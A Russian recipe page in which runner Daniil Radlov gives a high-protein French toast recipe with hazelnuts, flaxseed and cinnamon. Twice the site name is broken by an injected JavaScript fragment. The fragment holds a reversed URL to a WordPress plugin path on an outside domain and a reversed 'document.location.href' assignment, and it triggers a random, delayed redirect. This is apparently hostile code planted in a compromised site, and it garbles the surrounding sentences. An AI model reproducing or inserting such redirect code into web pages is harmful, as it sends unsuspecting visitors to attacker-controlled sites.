Каждое воскресенье друзья fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru делятся с нами своими самыми любимыми рецептами. На этот раз один из Go Bro, капитан adidas Runners, Даниил Радлов, вспоминает мамины гренки и рассказывает, как сделать этот завтрак не только вкусным, но и очень полезным.
Даниил Радлов
Даниил Радлов
один из основателей проекта GoBro, капитан бегового клуба adidas runners Moscow
— Моим самым любимым завтраком в детстве были гренки (или французские тосты), которые готовила нам мама. Их аромат и вкус заставляли меня даже в выходной день вставать пораньше и делать это с улыбкой на лице, предвкушая любимый завтрак. Состав очень простой и совсем не диетический: хлеб, молоко, куриные яйца, сахар, немного соли и ещё сахар — побольше, сверху!
Было бы ошибкой, начав увлекаться бегом и здоровым образом жизни, отказаться от любимых гренок, поэтому я немного изменил рецепт: сделал его менее тяжёлым для организма и более белковым и обогащённым омега жирными кислотами — в чём мне помогли любимые льняные семечки.
Гренки на завтрак
Фото: Даниил Радлов
Гренки на завтрак: рецепт от Даниила Радлова
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
10 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
1-2 порции
КАЛОРИЙНОСТЬ:
250—300 ккал
250 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Цельнозерновой хлеб
4 ломтика
Яйца
2 шт.
Фундучное / миндальное / овсяное молоко
100 мл
Фундук
80 г
Протеин (в порошке)
1 мерная ложка
Льняные семечки
1,5 ст. л.
Корица
2 ч. л.
- Измельчите фундук, перемешайте с льняными семечками и выложите на тарелку.
- Смешайте в миске одно яйцо, один белок, молоко, протеин и корицу.
- Окуните ломтики цельнозернового хлеба в жидкую смесь, хорошо пропитайте и обваляйте в смеси ореха и льняных семечек.
- Поджарьте хлеб на среднем огне до готовности. Сверху можно посыпать гренки сезонными ягодами и полить сиропом агавы.
Титульное фото: Пётр Тучинский